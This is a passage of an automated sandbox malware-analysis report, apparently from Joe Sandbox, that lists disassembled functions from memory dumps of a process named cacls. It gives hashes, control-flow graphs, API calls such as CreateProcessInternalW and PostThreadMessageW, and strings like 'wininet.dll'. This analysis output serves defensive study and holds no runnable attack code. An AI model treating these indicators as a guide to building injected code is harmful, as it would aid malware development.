                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: ab924305698def0fed0723e0d2fc0bf4fc3ff3ddd9fde5c9c52bbaf3461e0273
                                                            • Instruction ID: 6e936019a3e3cdfb2ca9538a3c6deda8fb409d8024080e705f9f2a57d69f9ba0
                                                            • Opcode Fuzzy Hash: ab924305698def0fed0723e0d2fc0bf4fc3ff3ddd9fde5c9c52bbaf3461e0273
                                                            • Instruction Fuzzy Hash: 0D9002A134140846D100B1984814B060005C7E1302F65C055E60A8554D8719CD566127
                                                            Function 03852E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 13cd119f149814f739260cbe30494ff180e915afb68d5b33d20e7ff0f4396f04
                                                            • Instruction ID: e679b13847a4f3b63c05da15ff247dde636889c9130c84afd3d78e8e5cb06c3f
                                                            • Opcode Fuzzy Hash: 13cd119f149814f739260cbe30494ff180e915afb68d5b33d20e7ff0f4396f04
                                                            • Instruction Fuzzy Hash: BD90026160140906D101B1984804716000A87D0242FA5C062A6068555ECB258A96A132
                                                            Function 03852EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 746a72471cb403b8db8a675b332cbc615e5d72cd5567e9a3b6b5afd75c43c9cb
                                                            • Instruction ID: 4a7f62ccb938ce4a421a48845c3e049aecc8aa7f83f712b5ea24311903f9e4e3
                                                            • Opcode Fuzzy Hash: 746a72471cb403b8db8a675b332cbc615e5d72cd5567e9a3b6b5afd75c43c9cb
                                                            • Instruction Fuzzy Hash: 7B9002A120180807D140B5984C04707000587D0303F65C051A70A8555E8B298D556136
                                                            Function 03852DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 652853052c4b62bbae638e0912c6c6dd24c9ffe9eec483547c405e3424e6219c
                                                            • Instruction ID: ae2e3b404ce00408107f9b8a21fb4e9e83bb6e8d0573ccc04214a353835166ec
                                                            • Opcode Fuzzy Hash: 652853052c4b62bbae638e0912c6c6dd24c9ffe9eec483547c405e3424e6219c
                                                            • Instruction Fuzzy Hash: 12900261242445565545F1984804607400697E02427A5C052A6458950C8626995AD622
                                                            Function 03852DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 6064a0cea3b08c6b84ae3521a92dbb57e37134c7ba7f44a3be288b03663be352
                                                            • Instruction ID: 3f26fefff5aa2b015823f60a254a3569c4b4bc4525855e17df0a7a2b97390e20
                                                            • Opcode Fuzzy Hash: 6064a0cea3b08c6b84ae3521a92dbb57e37134c7ba7f44a3be288b03663be352
                                                            • Instruction Fuzzy Hash: E290027120140817D111B1984904707000987D0242FA5C452A5468558D97568A56A122
                                                            Function 03852D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 8367813cd72ca08284f0b67ace3fec61bee528d0d8d5c64b8ec972fc42cf51ee
                                                            • Instruction ID: 485fdc472162666ee75f12e65b15cd82ff05120b216aaae350d681b036e24951
                                                            • Opcode Fuzzy Hash: 8367813cd72ca08284f0b67ace3fec61bee528d0d8d5c64b8ec972fc42cf51ee
                                                            • Instruction Fuzzy Hash: 6190026921340406D180B198580870A000587D1203FA5D455A5059558CCA15896D5322
                                                            Function 03852D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 9dcdaddd6642fce4b122b664aac5328b41ad89bace673c821b741212e0e84684
                                                            • Instruction ID: 9799c7ea5337b3f8f44b70bb96e0c42d53bdc57b1eda5c7e3ddf61368eafa56d
                                                            • Opcode Fuzzy Hash: 9dcdaddd6642fce4b122b664aac5328b41ad89bace673c821b741212e0e84684
                                                            • Instruction Fuzzy Hash: CA90026130140407D140B19858187064005D7E1302F65D051E5458554CDA15895A5223
                                                            Function 03852CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: b0f7cb4a274c8236c2ecd26749985dc556de295692011bb4da3f9f159868892b
                                                            • Instruction ID: 9042c92cd25b81d7213d11a4801f3c243588a5e78ffd3bc44de2c974708445b1
                                                            • Opcode Fuzzy Hash: b0f7cb4a274c8236c2ecd26749985dc556de295692011bb4da3f9f159868892b
                                                            • Instruction Fuzzy Hash: 0690027120140806D100B5D85808746000587E0302F65D051AA068555EC76589956132
                                                            Function 03852C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 85d5511cacdf028d4defd793ddd69879dfeb92bda28c0ddb2db277c716d1ea96
                                                            • Instruction ID: fa4c7c08b29ce24f58627e2f50f2675b988e05bf873ae5be8c0064623a24998a
                                                            • Opcode Fuzzy Hash: 85d5511cacdf028d4defd793ddd69879dfeb92bda28c0ddb2db277c716d1ea96
                                                            • Instruction Fuzzy Hash: 1790027120140C46D100B1984804B46000587E0302F65C056A5168654D8715C9557522
                                                            Function 03852C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1efaae26aeb1c283a8fbd7192043456013867ada9fe928ea226e3be2e1a45391
                                                            • Instruction ID: 2d4d5b5bbcaac1651a565dbec0ae8bc8c9ff33a088c1f77771757d2183afe182
                                                            • Opcode Fuzzy Hash: 1efaae26aeb1c283a8fbd7192043456013867ada9fe928ea226e3be2e1a45391
                                                            • Instruction Fuzzy Hash: 7390027120148C06D110B198880474A000587D0302F69C451A9468658D879589957122
                                                            Function 038535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 18a9f97cbeb5c39aa6f7b5710c9148f8bc8e542af0a1f3690370b7eeebdf05a3
                                                            • Instruction ID: 7ab17cad6f65624b43eb08b03d587c4508d4f2f488cc167eda65a4beab0b5cd7
                                                            • Opcode Fuzzy Hash: 18a9f97cbeb5c39aa6f7b5710c9148f8bc8e542af0a1f3690370b7eeebdf05a3
                                                            • Instruction Fuzzy Hash: E690027160550806D100B1984914706100587D0202F75C451A5468568D87958A5565A3
                                                            Function 038539B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: a15bd527207def57e3f1dbb8fe5b62d5b94974de0b5bd03fc2114d3e2be862a1
                                                            • Instruction ID: 735270a135d49f7c038bb189ca631a9fbe175522dea680f0ff49f767a907383f
                                                            • Opcode Fuzzy Hash: a15bd527207def57e3f1dbb8fe5b62d5b94974de0b5bd03fc2114d3e2be862a1
                                                            • Instruction Fuzzy Hash: 0990026124545506D150B19C48047164005A7E0202F65C061A5858594D865589596222
                                                            Function 00BF3E10 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 108sleepCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 434 bf3e10-bf3e58 call bfb8d0 437 bf3e5e-bf3ed8 call bfb9b0 call be4890 call bd13e0 call bf1fe0 434->437 438 bf3f64-bf3f6a 434->438 447 bf3ee0-bf3ef4 Sleep 437->447 448 bf3ef6-bf3f08 447->448 449 bf3f55-bf3f5c 447->449 450 bf3f2a-bf3f43 call bf6370 448->450 451 bf3f0a-bf3f28 call bf62d0 448->451 449->447 452 bf3f5e 449->452 456 bf3f48-bf3f4b 450->456 451->456 452->438 456->449
                                                            APIs
                                                            • Sleep.KERNELBASE(000007D0), ref: 00BF3EEB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: i:4$net.dll$wininet.dll
                                                            • API String ID: 3472027048-2634764057
                                                            • Opcode ID: 9c19912619b969d4492f2daff6b2ffbad7a51720dc2e438e4577885ffa5e0c71
                                                            • Instruction ID: 8b19cb652357177c1c319e7fd3531e93170f1b5734f0f7b6e36c1e2d3bb1be18
                                                            • Opcode Fuzzy Hash: 9c19912619b969d4492f2daff6b2ffbad7a51720dc2e438e4577885ffa5e0c71
                                                            • Instruction Fuzzy Hash: 1E314DB1A00709BBD714DFA4D881FEAB7F8EB88710F008559BA596B241D7B06B44CBA4
                                                            Function 00BE0FFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 457 be0ffc-be1016 458 be1019-be1054 457->458 459 be1056 458->459 460 be10b4-be110a call be4890 call bd13e0 call bf1fe0 458->460 462 be1057-be1058 459->462 477 be110c-be111b PostThreadMessageW 460->477 478 be112a-be1130 460->478 464 be105a-be106c 462->464 465 be1084 462->465 464->458 472 be106e-be1075 464->472 465->462 466 be1085-be1087 465->466 469 be1089-be1090 466->469 470 be1091 466->470 469->470 474 be1077-be1080 472->474 475 be1082-be1083 472->475 474->475 475->465 477->478 479 be111d-be1127 477->479 479->478
                                                            APIs
                                                            • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 00BE1117
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: t577G2K6$t577G2K6
                                                            • API String ID: 1836367815-2667467881
                                                            • Opcode ID: 0552f22b151b17f9e535a8ed6bb9008edb1782d23ebd6ebc5d6af9584400a9a1
                                                            • Instruction ID: a5f9ce71aeec62dd5d9ab2f21eb474973ece6a6dc27e8c9b21a2f7eabd3b04bf
                                                            • Opcode Fuzzy Hash: 0552f22b151b17f9e535a8ed6bb9008edb1782d23ebd6ebc5d6af9584400a9a1
                                                            • Instruction Fuzzy Hash: BB31C372A052D47B8B01DB7A9C42DEDBBE8EE523A471445E9FE449B102D7368D03CBD1
                                                            Function 00BE1097 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 480 be1097-be10b2 481 be10ba-be10d2 call bfc410 480->481 482 be10b5 call bfba00 480->482 485 be10d8-be110a call bd13e0 call bf1fe0 481->485 486 be10d3 call be4890 481->486 482->481 491 be110c-be111b PostThreadMessageW 485->491 492 be112a-be1130 485->492 486->485 491->492 493 be111d-be1127 491->493 493->492
                                                            APIs
                                                            • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 00BE1117
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: t577G2K6$t577G2K6
                                                            • API String ID: 1836367815-2667467881
                                                            • Opcode ID: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                            • Instruction ID: 1696fbb01f65d290a53f6d326d6a2e2f70f51365eb973a0587d8da91998a482f
                                                            • Opcode Fuzzy Hash: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                            • Instruction Fuzzy Hash: 4311C6B1D4025C7EDB119AE48C82DEFBBBCEF016A4F0185A9F654A7141E6345E068BA1
                                                            Function 00BE10A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 494 be10a0-be10d2 call bfba00 call bfc410 499 be10d8-be110a call bd13e0 call bf1fe0 494->499 500 be10d3 call be4890 494->500 505 be110c-be111b PostThreadMessageW 499->505 506 be112a-be1130 499->506 500->499 505->506 507 be111d-be1127 505->507 507->506
                                                            APIs
                                                            • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 00BE1117
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: t577G2K6$t577G2K6
                                                            • API String ID: 1836367815-2667467881
                                                            • Opcode ID: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                            • Instruction ID: 567bf2c709d264fa9b79852900b76e6d47e33e7b9d7b32a97abe4df7c3d221a1
                                                            • Opcode Fuzzy Hash: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                            • Instruction Fuzzy Hash: A40184B1D0025C7ADB11AAE58C82DEFBBBCDF416D4F0484A4FA54A7141E6785E0687B1
                                                            Function 00BEF870 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: @J7<
                                                            • API String ID: 3442037557-2016760708
                                                            • Opcode ID: 58fcf34726c1358f6274ab2e4884b5cd5ecb42eb9839d8182d394bc5e53a52cd
                                                            • Instruction ID: 17aead403202c55b46d6bc693a6e484743e2285b1560d660ba510a71aae9fa44
                                                            • Opcode Fuzzy Hash: 58fcf34726c1358f6274ab2e4884b5cd5ecb42eb9839d8182d394bc5e53a52cd
                                                            • Instruction Fuzzy Hash: 68314175A0020AAFDB00DFD9D8809EEB3B9FF88304B108599E545AB215D771EE058BA0
                                                            Function 00BEF869 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: @J7<
                                                            • API String ID: 3442037557-2016760708
                                                            • Opcode ID: 257f969a4aa80e5bec027f51d7631632e6c2a67b49a4ff1dd47c9b0a68ac93b6
                                                            • Instruction ID: 47271cc18b08e975fbd7422dfbf5a644af912ef84d1aa5280839538a18d0c456
                                                            • Opcode Fuzzy Hash: 257f969a4aa80e5bec027f51d7631632e6c2a67b49a4ff1dd47c9b0a68ac93b6
                                                            • Instruction Fuzzy Hash: 36315475A0020AAFDB00DFD9D8809EFB7B9FF88304B108599E555EB215D771EE45CBA0
                                                            Function 00BE84EA Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00BE2040,00BF834F,00BF5A0E,00BE2006), ref: 00BE84E3
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 4e02e0d7e3b3a53fe3a078bdd5fcac6e3ec5e91085e971d8e4e24b2f4b3ac688
                                                            • Instruction ID: aad4941b7ea61558eee1e9edfc625751daada12987eeb6ab7bbd8eb17568fa22
                                                            • Opcode Fuzzy Hash: 4e02e0d7e3b3a53fe3a078bdd5fcac6e3ec5e91085e971d8e4e24b2f4b3ac688
                                                            • Instruction Fuzzy Hash: 1911CA719103097FDB10EBE5DC46FAA73F8DB55360F0041D9F90C9B282EB74AA448795
                                                            Function 00BE4890 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00BE4902
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                            • Instruction ID: 182336a043f820feeb04b47d66afd93aed23ce4115bd5e5fd7d4b55d980789ef
                                                            • Opcode Fuzzy Hash: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                            • Instruction Fuzzy Hash: B0011EB9D0020DABDF10EAA5DD42FAEB7B89B54308F0041E5EA0897241F771EB58CB91
                                                            Function 00BF9C70 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessInternalW.KERNELBASE(?,?,?,?,00BE867E,00000010,?,?,?,00000044,?,00000010,00BE867E,?,?,?), ref: 00BF9CD0
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateInternalProcess
                                                            • String ID:
                                                            • API String ID: 2186235152-0
                                                            • Opcode ID: 53127c51fb8e915e2ada1bd4b1e5bd03c96a5b42473f202cca94c82170286ba0
                                                            • Instruction ID: 0863de7b894bea71686f39387520c426e47723c6b47960d8b3a79c2e43bbd014
                                                            • Opcode Fuzzy Hash: 53127c51fb8e915e2ada1bd4b1e5bd03c96a5b42473f202cca94c82170286ba0
                                                            • Instruction Fuzzy Hash: 3E0180B6214208BBCB44DF99DC81EEB77EDAF8D754F508609BA19A3241D630F851CBA4
                                                            Function 00BE4958 Relevance: 1.5, APIs: 1, Instructions: 43libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00BE4902
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                            • Instruction ID: fbe394c8b0651c3fa69e6f2c74e167895d28351c0e27fb3e370b048dc4802148
                                                            • Opcode Fuzzy Hash: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                            • Instruction Fuzzy Hash: B7F02831E842498FDB00CFE8DC86BD9B3F0FB56719F1406D9DA099B241E3626556CB45
                                                            Function 00BD9DF0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00BD9E35
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: 8abc526603ee69cc07ae379c75a4a6867cf3df2a5e9c00712d5c962cde03cd73
                                                            • Instruction ID: b30474d2aefbf1b405d5d15232f0a973251ad9947f93019c7258dd73883f0738
                                                            • Opcode Fuzzy Hash: 8abc526603ee69cc07ae379c75a4a6867cf3df2a5e9c00712d5c962cde03cd73
                                                            • Instruction Fuzzy Hash: 80F0303338021436D221A5E99C03FDBB68C8B817A1F140466F70CDA285D591B50582A9
                                                            Function 00BD9DEC Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00BD9E35
                                                            Memory Dump Source
